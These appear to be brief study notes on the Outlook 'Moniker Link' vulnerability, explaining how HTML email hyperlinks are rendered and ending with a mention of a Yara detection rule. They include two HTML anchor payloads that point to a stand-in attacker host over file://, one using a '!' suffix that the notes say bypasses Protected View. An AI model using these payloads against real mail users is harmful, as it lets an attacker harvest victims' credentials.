Moniker Link

What was the problem with Outlook?

**OutLook parses emails in HTML format. So if there is a hyperlinks that are known as Moniker Links that will help open the provided Urls

1

<a href="file://ATTACKER_IP/test">Click me</a>

When Outlook renders this moniker link we will face the protected view window but could happen if we bypass it

The CVE claims that when we add ‘! + “random text”’

1

<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

Here the protected view is bypassed

Detection

A Yara rule was made by Florian Roth